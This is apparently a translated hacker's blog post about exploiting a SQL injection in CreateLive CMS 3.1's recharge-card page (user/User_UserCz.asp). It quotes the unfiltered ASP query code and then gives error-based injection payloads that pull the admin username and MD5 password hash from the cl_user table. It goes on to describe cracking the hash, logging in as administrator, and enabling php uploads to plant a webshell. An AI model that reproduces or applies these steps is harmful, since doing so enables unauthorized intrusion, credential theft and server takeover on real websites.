CreateLive CMS 3.1 Injection Vulnerability

I accidentally saw a book published by a black hand in February, and found the CreateLive CMS 4.2 injection vulnerability. The author is Chaoyang. There is a CreateLive CMS system in the hand, but the version is 3.1. I think this hole should also exist!

The website is open for registration. Start!

The injected file is user/User_UserCz.asp. In the defined chkCzNum function, CzNum, CzUser, and Pass are not filtered and brought into the query statement to form an injection vulnerability. The vulnerability cannot be guessed using the injection tool. The main cause is verification code and POST submission. The related code is as follows:

<-- More -->

Sub chkCzNum ()
Dim CzUser, Self, CzNum, Pass
Dim sPoint, sPointAll, sDayNum, sDayNumAll
Dim rsUser, ChargeType
CzUser = Trim (request ("CzUser "))
Self = Trim (request ("Self "))
CzNum = Trim (request ("CzNum "))
Pass = Trim (request ("Pass "))
If CzNum = "" or Pass = "" then
Call Cl. OutMsg ("the recharge card number or recharge password cannot be blank! "," User_UserCz.asp ")
End if
If Not Cl. CodeIsTrue (Trim (request ("ChkPlusCz"), "ChkPlusCz") then
Call Cl. OutMsg ("Incorrect verification code", "User_UserCz.asp ")
End if
Dim rsCz
Set rsCz = Server. CreateObject ("Adodb. RecordSet ")
OpenConn: rsCz. open "Select * from Cl_UserCz where CzNum =" & CzNum & "and Pass =" & Pass & "", Conn, 1, 3
If rsCz. bof and rsCz. eof then
RsCz. close: set rsCz = Nothing
Call Cl. OutMsg ("This recharge card does not exist or the password is incorrect. Please enter it again! "," User_UserCz.asp ")
End if
SPoint = rsCz ("Point ")
SDayNum = rsCz ("DayNum ")
If rsCz ("IsUser") <> 0 then
RsCz. close: set rsCz = Nothing
Call Cl. OutMsg ("This recharge card is already in use! "," User_UserCz.asp ")
End if

Click "recharge card" to enter, enter the "recharge card number" and enter the injection statement, and then click "recharge,

An error is returned. You can confirm that the database type is mssql.

Cl_admin is used to store user data. cl_admin is the administrator table and its fields include username and password. Cl_user is a user table with the same fields as the administrator table.

3 and 1 = (select username from cl_user where userid = 1); -- the name of the first user is Admin,

3 and 1 = (select userpassword from cl_user where userid = 1); -- broke the hash of the Admin user password md5,

Log On with the username and password,

For webshell, you can modify the file type to php,